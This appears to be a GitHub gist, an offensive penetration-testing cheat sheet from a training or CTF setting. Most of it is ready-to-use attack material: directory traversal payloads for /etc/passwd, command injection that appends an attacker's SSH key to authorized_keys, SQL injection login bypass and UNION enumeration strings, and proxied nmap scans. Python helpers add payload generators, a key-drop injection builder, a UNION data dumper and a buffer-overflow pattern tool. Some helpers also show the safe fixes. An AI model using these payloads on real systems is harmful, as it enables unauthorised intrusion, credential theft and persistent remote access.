@ZacFran
Last active August 16, 2023 11:40

RECON PHASE

Ping Sweep Scripts

LINUX

for i in {1..254}; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done # one probe per host, backgrounded; each printed line is a live host

Windows

for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up
(typed at the cmd prompt; inside a .bat file the variable is written %%i)
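The same sweep, as an added example that is not part of the original gist: a concurrent Python version that builds the OS-specific ping command as an argv list (no shell, so an attacker-controlled address cannot smuggle in a second command) and parses replies the way the two loops above do. It assumes a `ping` binary on PATH; the `192.168.1` prefix and the worker count are placeholders.

```python
#!/usr/bin/env python3
"""Added example, not part of the original gist: a concurrent ping sweep that
builds the OS-specific ping command without a shell and parses the replies the
same way the one-liners above do.  Assumptions: a `ping` binary on PATH; the
prefix/worker defaults below are placeholders for the target network."""
import platform
import subprocess
from concurrent.futures import ThreadPoolExecutor
from typing import List, Optional


def ping_argv(ip: str, timeout_ms: int = 200, system: Optional[str] = None) -> List[str]:
    """One echo request with a short timeout, as an argv list."""
    system = system or platform.system()
    if system == "Windows":
        return ["ping", "-n", "1", "-w", str(timeout_ms), ip]               # -w is in ms
    return ["ping", "-c", "1", "-W", str(max(1, timeout_ms // 1000)), ip]  # -W is in s


def is_alive(output: str) -> bool:
    """Match the reply line the shell loops key on.  Windows ping also prints
    'Reply from <gateway>: Destination host unreachable.' for dead hosts, a
    reply that the cmd loop's && cannot tell from a real one, so exclude it."""
    for line in output.splitlines():
        if "bytes from" in line:                                    # Linux / macOS reply
            return True
        if line.startswith("Reply from") and "unreachable" not in line.lower():
            return True                                             # Windows reply
    return False


def probe(ip: str) -> Optional[str]:
    """Return the address if it answered, else None."""
    try:
        proc = subprocess.run(ping_argv(ip), capture_output=True, text=True, timeout=5)
    except (subprocess.TimeoutExpired, FileNotFoundError):
        return None
    return ip if is_alive(proc.stdout) else None


def sweep(prefix: str = "192.168.1", first: int = 1, last: int = 254,
          workers: int = 64) -> List[str]:
    """Probe prefix.first .. prefix.last concurrently and return the live hosts."""
    targets = [f"{prefix}.{i}" for i in range(first, last + 1)]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return [ip for ip in pool.map(probe, targets) if ip]


if __name__ == "__main__":
    for host in sweep():
        print(host, "is up")
```

Run it as `python3 sweep.py`; change the `sweep()` defaults for another /24. Hosts that drop ICMP will be missed by this and by the loops above, which is why the nmap `-Pn` scans that follow do not rely on the sweep.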

NMAP

nmap -Pn -T5 -sT <IP>

ssh <user>@<redir> -D 9050 # SOCKS proxy on 127.0.0.1:9050, the port the default proxychains.conf points at

proxychains nmap -Pn -T5 -sT -p 80 --script http-enum.nse <IP>
proxychains nmap -Pn -T5 -sT -p 80 --script http-sql-injection.nse <IP>
proxychains nmap -Pn -T5 -sT -p 80 --script http-robots.txt.nse <IP>

nikto -h <IP>

Web Exploitation

wget

wget -r -l 2 -P <output dir> http://<web ip>/ # recursive download, two levels deep, saved under <output dir>

Directory Traversal

  • When a web page reads a file named by user input, walk up the tree with ../ (repeat it until the path resolves, e.g. ../../../etc/passwd)
    /etc/passwd - take note of the users and their home directories
    /etc/hosts - network enum
    /etc/networks - network enum
    /etc/group - group information
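As an added example (not code from the original gist): a small Python helper that generates the ../ payloads at increasing depth, optionally URL-encoded, and triages the four files listed above once they come back, pulling out the accounts that have a real login shell together with their home directories, the groups that have explicit members, and the hosts entries. The file contents embedded in it are constructed for the demo; the `file=` parameter name in the usage note is an assumption about the target page.

```python
#!/usr/bin/env python3
"""Added example, not part of the original gist: generate ../ payloads of
increasing depth for a file-read parameter and triage the files listed above
once they come back.  The sample file contents are constructed for the demo."""
from typing import Dict, List, Tuple

TARGET_FILES = ["etc/passwd", "etc/group", "etc/hosts", "etc/networks"]
LOGIN_SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "csh", "tcsh", "fish"}


def traversal_payloads(path: str, max_depth: int = 6, encode: bool = False) -> List[str]:
    """'../' * n + path for n = 1..max_depth; the depth that works tells you how
    far below / the web root sits.  encode=True URL-encodes the traversal part,
    which gets past filters that only look for a literal '../'."""
    step = "%2e%2e%2f" if encode else "../"
    return [step * depth + path for depth in range(1, max_depth + 1)]


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split /etc/passwd into dicts; malformed lines are skipped."""
    users = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        users.append({"user": fields[0], "uid": fields[2], "gid": fields[3],
                      "home": fields[5], "shell": fields[6]})
    return users


def login_users(users: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Only accounts with a real login shell are worth a password guess or an
    authorized_keys drop; nologin/false/sync accounts are filtered out."""
    return [u for u in users if u["shell"].rsplit("/", 1)[-1] in LOGIN_SHELLS]


def parse_group(text: str) -> Dict[str, List[str]]:
    """group name -> explicit members, for groups that have any (sudo, adm, docker...)."""
    groups = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[3]:
            groups[fields[0]] = fields[3].split(",")
    return groups


def parse_hosts(text: str) -> List[Tuple[str, List[str]]]:
    """(address, [names]) pairs from /etc/hosts, comments and blanks dropped."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            addr, *names = line.split()
            entries.append((addr, names))
    return entries


# Constructed sample data standing in for what the traversal returned.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
student:x:1000:1000:Student,,,:/home/student:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/false
"""
SAMPLE_GROUP = """root:x:0:
sudo:x:27:student
www-data:x:33:
docker:x:999:student,deploy
"""
SAMPLE_HOSTS = """127.0.0.1 localhost
# internal services
10.10.5.20 db01 db01.corp.local
10.10.5.21 jump
"""

if __name__ == "__main__":
    for payload in traversal_payloads("etc/passwd", 3):
        print("try: ?file=" + payload)
    for u in login_users(parse_passwd(SAMPLE_PASSWD)):
        print("login user:", u["user"], "home:", u["home"])
    print("groups with members:", parse_group(SAMPLE_GROUP))
    print("hosts:", parse_hosts(SAMPLE_HOSTS))
```

The home directories it prints are what the command-injection steps further down need for the authorized_keys drop, and a user that appears in `sudo`, `wheel`, `adm` or `docker` in the group output is the one to target first.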

Command Injection

  • When a web page passes user input into a shell command, a ; (or &&, |, newline) ends that command and starts yours

On local host

ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub # copy the public key

Inject

; whoami
; cat /etc/passwd # take note of the user's home directory
; ls -la <home directory>

; mkdir <home directory>/.ssh # only if .ssh does not exist yet
; echo "<public key>" >> <home directory>/.ssh/authorized_keys # >> appends, so any keys already there are kept
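To show why the `;` works and what the fix looks like, here is an added example (not the gist's own code, and not the target's): a handler that splices user input into a shell string, the same lookup done with an argv list and an allow-list, and the mkdir/echo chain above assembled into one paste-able string. `echo` stands in for whatever command the real page runs (ping, nslookup, ...) so the demo runs offline; the home directory and public key are constructed.

```python
#!/usr/bin/env python3
"""Added example, not part of the original gist: the handler pattern that makes
`; whoami` work, the fixed version, and the authorized_keys drop from the list
above assembled into one injection string.  `echo` stands in for the real
command so the demo runs offline; the home directory and key are constructed."""
import re
import shlex
import subprocess


def lookup_vulnerable(host: str) -> str:
    """shell=True: /bin/sh parses the string, so ';' ends echo and starts a
    second command of the attacker's choosing."""
    return subprocess.run("echo " + host, shell=True,
                          capture_output=True, text=True).stdout


def lookup_safe(host: str) -> str:
    """argv list, no shell: the whole input is a single argument to echo, and
    ';' is just a character inside it."""
    return subprocess.run(["echo", host], capture_output=True, text=True).stdout


def is_valid_host(host: str) -> bool:
    """Allow-list the expected format as well (defence in depth for the day
    somebody reintroduces shell=True)."""
    return re.fullmatch(r"[A-Za-z0-9.-]{1,253}", host) is not None


def lookup_safe_validated(host: str) -> str:
    if not is_valid_host(host):
        raise ValueError("not a hostname or address")
    return lookup_safe(host)


def ssh_key_payload(home: str, pubkey: str) -> str:
    """The mkdir/echo chain from the list above as one injection string.
    'mkdir -p' removes the need to check whether .ssh exists, '>>' appends so
    existing keys survive, and shlex.quote keeps the key's spaces intact."""
    h = shlex.quote(home)
    return (f"; mkdir -p {h}/.ssh"
            f"; echo {shlex.quote(pubkey)} >> {h}/.ssh/authorized_keys")


if __name__ == "__main__":
    attack = "x; echo INJECTED"
    print("vulnerable ->", repr(lookup_vulnerable(attack)))
    print("safe       ->", repr(lookup_safe(attack)))
    print(ssh_key_payload("/home/student", "ssh-rsa AAAAB3 kali@kali"))
```

Paste the string `ssh_key_payload` returns into the injectable field; once it lands, `ssh -i ~/.ssh/id_rsa <user>@<IP>` logs in with the key generated on the local host.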

SQL Injection

  • using valid SQL syntax inside user input to change the meaning of the query the application builds

Login Bypass

tom' OR 1=1 #    (paste in both the username and password fields; the # starts a MySQL comment that discards the rest of the query)

#### if the creds didn't dump ####
# press F12
# under the Network tab
# copy the raw SQL from the POST request
# <URL>/placeholder.php?<paste here>

GET Method (URL)

The UNION SELECT must return the same number of columns as the original query (three here, five in the POST form further down); pad with literals or NULL until the error goes away.

<URL>/uniondemo.php?Selection=2 UNION SELECT 1,table_name,3 FROM information_schema.tables

<URL>/uniondemo.php?Selection=2 UNION SELECT 1,table_schema,table_name FROM information_schema.tables

<URL>/uniondemo.php?Selection=2 UNION SELECT table_name,1,column_name FROM information_schema.columns

<URL>/uniondemo.php?Selection=2 UNION SELECT table_schema,column_name,table_name FROM information_schema.columns

<URL>/uniondemo.php?Selection=2 UNION SELECT null,name,color FROM car

POST Method (Form INPUT)

Audi' UNION SELECT 1,2,table_name,4,5 FROM information_schema.tables #

Audi' UNION SELECT 1,2,3,table_schema,table_name FROM information_schema.tables; #

Audi' UNION SELECT 1,2,table_schema,table_name,column_name FROM information_schema.columns; #     

Audi' UNION SELECT 1,2,3,name,size FROM session.Tires; #

Audi' UNION SELECT @@version,database(),3,name,size FROM session.Tires; #
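As an added example (not code from the original gist), the login bypass and the UNION enumeration from this section replayed against an in-memory SQLite database so they run offline. Two deliberate differences from the MySQL target the gist assumes are labelled in the code: SQLite has no `information_schema` (its `sqlite_master` table lists the tables instead), and it only understands `--` comments, so the bypass string ends in `--` rather than `#`. The tables, columns and rows are constructed.

```python
#!/usr/bin/env python3
"""Added example, not part of the original gist: login bypass and UNION
enumeration against an in-memory SQLite database.  Differences from the MySQL
target the gist assumes: sqlite_master instead of information_schema, and '--'
comments instead of '#'.  All tables and rows are constructed."""
import sqlite3
from typing import List, Optional


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'tom', 's3cret'), (2, 'admin', 'hunter2');
        CREATE TABLE car(id INTEGER, name TEXT, color TEXT);
        INSERT INTO car VALUES (1, 'Audi', 'black'), (2, 'BMW', 'white');
    """)
    return con


def login_vulnerable(con, user: str, pw: str) -> List[str]:
    """String-built query: the quote in the input closes the literal early."""
    sql = f"SELECT username FROM users WHERE username='{user}' AND password='{pw}'"
    return [row[0] for row in con.execute(sql)]


def login_safe(con, user: str, pw: str) -> List[str]:
    """Parameterised query: the input is a value, never SQL syntax."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in con.execute(sql, (user, pw))]


def car_lookup_vulnerable(con, selection: str) -> list:
    """The ?Selection= endpoint: a numeric parameter dropped straight into SQL."""
    return con.execute(f"SELECT id, name, color FROM car WHERE id={selection}").fetchall()


def find_column_count(con, max_cols: int = 8) -> Optional[int]:
    """Step 1 of a UNION attack: grow 'UNION SELECT NULL,NULL,...' until the
    database stops complaining about mismatched column counts."""
    for n in range(1, max_cols + 1):
        try:
            car_lookup_vulnerable(con, "2 UNION SELECT " + ",".join(["NULL"] * n))
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_dump(con, select_tail: str) -> List[tuple]:
    """Step 2: tag the injected rows with a marker in the first column so they
    can be told apart from the legitimate result row."""
    rows = car_lookup_vulnerable(con, "2 UNION SELECT 'inj', " + select_tail)
    return [row[1:] for row in rows if row[0] == "inj"]


def enumerate_tables(con) -> List[str]:
    # MySQL equivalent: SELECT table_name ... FROM information_schema.tables
    return sorted(name for name, _ in
                  union_dump(con, "name, sql FROM sqlite_master WHERE type='table'"))


def dump_users(con) -> List[tuple]:
    return sorted(union_dump(con, "username, password FROM users"))


if __name__ == "__main__":
    db = build_db()
    bypass = "tom' OR 1=1 --"
    print("vulnerable login:", login_vulnerable(db, bypass, bypass))
    print("safe login:     ", login_safe(db, bypass, bypass))
    print("columns:", find_column_count(db))
    print("tables: ", enumerate_tables(db))
    print("users:  ", dump_users(db))
```

The marker trick in `union_dump` is the same reason the page's payloads put `1`, `2` or `null` in the columns it does not care about: those slots only have to exist and type-check, and a recognisable constant makes the injected rows easy to pick out of the response.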

Linux Boxes

Enumeration

ps -elf # shows every process

ps aux # look for syslog / rsyslog processes
# their config files live under /etc (e.g. /etc/rsyslog.conf)

lsof # shows all open files

cat # the following files are good ones to check
# /etc/crontab - scheduled jobs
# /etc/sudoers - who may run sudo (readable only by root; sudo -l shows your own rights)
# /etc/hosts - network information

find / -iname '*example*' 2>/dev/null # quote the glob so the shell does not expand it first

Vulnerable suid/sgid executables

find / -type f -perm /4000 -ls 2>/dev/null # Find SUID only files

find / -type f -perm /2000 -ls 2>/dev/null # Find SGID only files

find / -type f -perm /6000 -ls 2>/dev/null # Find SUID and/or SGID files
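The same hunt done in Python, as an added example that is not part of the original gist: it reads the mode bits with `os.lstat`, which makes the difference between `-perm /6000` (either bit set, what the three finds above report) and `-perm -6000` (both bits set) explicit. `demo()` builds a throw-away directory with one file per case; no real system paths are assumed.

```python
#!/usr/bin/env python3
"""Added example, not part of the original gist: the SUID/SGID hunt with
os.lstat.  demo() creates a temp directory with one file per case; no real
system paths are assumed."""
import os
import stat
import tempfile
from typing import List, Optional, Tuple


def classify(mode: int) -> Optional[str]:
    """Label a st_mode by its special bits, or None if neither is set."""
    suid = bool(mode & stat.S_ISUID)
    sgid = bool(mode & stat.S_ISGID)
    if suid and sgid:
        return "SUID+SGID"          # the only case -perm -6000 matches
    if suid:
        return "SUID"               # -perm /4000
    if sgid:
        return "SGID"               # -perm /2000
    return None                     # -perm /6000 matches all three labels above


def find_special(root: str, require_both: bool = False) -> List[Tuple[str, str]]:
    """Walk root and return (path, label) for regular files with SUID and/or
    SGID set; require_both=True is the -perm -6000 behaviour.  Symlinks are not
    followed and unreadable directories are skipped, like find ... 2>/dev/null."""
    hits = []
    for dirpath, _, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            label = classify(st.st_mode)
            if label and (not require_both or label == "SUID+SGID"):
                hits.append((path, label))
    return sorted(hits)


def demo() -> List[str]:
    """Create plain, SUID, SGID and SUID+SGID files in a temp dir and return
    the labels find_special reports (the plain file must not appear)."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in (("plain", 0o755), ("suid", 0o4755),
                           ("sgid", 0o2755), ("both", 0o6755)):
            path = os.path.join(tmp, name)
            open(path, "w").close()
            os.chmod(path, mode)
        return [label for _, label in find_special(tmp)]


if __name__ == "__main__":
    print(demo())
    for path, label in find_special("/usr"):
        print(label, path)
```

Run against `/` it gives the same list as the finds above; anything outside the distribution's usual set (su, sudo, passwd, mount and friends) is what to look up next.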

Linux exploitation

scp ./RE_This student@<ME>:/home/dir/ # scp <source> <user>@<host>:<destination>
gdb ./RE_This
(gdb) disassemble main # start with main
# follow the calls until you find unsafe function calls
(gdb) run <<< "<pattern from wiremask>" # feed the pattern on stdin; gdb hands the redirection to the shell
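The pattern wiremask generates, and the lookup you do afterwards, as an added example that is not code from the original gist: `pattern_create` produces the cyclic `Aa0Aa1...` string in which every 4-byte window is unique, and `pattern_offset` turns the value gdb shows in the instruction pointer after the crash back into the offset of the overwrite. The crash value `0x41326141` in the usage is constructed.

```python
#!/usr/bin/env python3
"""Added example, not part of the original gist: the cyclic pattern that
wiremask's generator (and msf-pattern_create) produce, plus the offset lookup
you do once the crash shows pattern bytes in the instruction pointer."""
import string
from typing import Union


def pattern_create(length: int) -> str:
    """Metasploit-style pattern: every 'Aa0'..'Zz9' triplet is unique, so any
    4-byte window occurs at exactly one offset (up to 20280 bytes)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value: Union[int, str, bytes], length: int = 20280) -> int:
    """Offset of the bytes now sitting in EIP/RIP.  An int is taken the way gdb
    prints the register, so it is reversed into little-endian bytes first;
    a str/bytes is searched as-is.  Returns -1 if the value is not from the
    pattern (e.g. the overflow did not reach the return address)."""
    if isinstance(value, int):
        width = 8 if value > 0xFFFFFFFF else 4
        needle = value.to_bytes(width, "little").decode("ascii", "replace")
    elif isinstance(value, bytes):
        needle = value.decode("ascii", "replace")
    else:
        needle = value
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    import sys
    n = int(sys.argv[1]) if len(sys.argv) > 1 else 200
    print(pattern_create(n))
    # e.g. gdb reports EIP 0x41326141 after the crash:
    print("offset:", pattern_offset(0x41326141))
```

In gdb, `run <<< "$(python3 pattern.py 200)"` feeds the pattern on stdin; after the crash, `info registers eip` (or `rip`) gives the value to hand to `pattern_offset`, and the returned offset is how many bytes of padding go before the address you want to land on.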

Windows

Xfreerdp through a tunnel

ssh <user>@<redir> -L <RHP>:<windows box>:3389 -NT
xfreerdp /u:<winuser> /p:<passwd> /v:127.0.0.1:<RHP> /dynamic-resolution +glyph-cache +clipboard

Enumeration

net user # user information

net localgroup # groups information

tasklist /v # process enumeration

arp -a # arp table
GUI
  • regedit
  • services.msc
  • taskschd.msc (scheduled tasks; schtasks /query from the command line)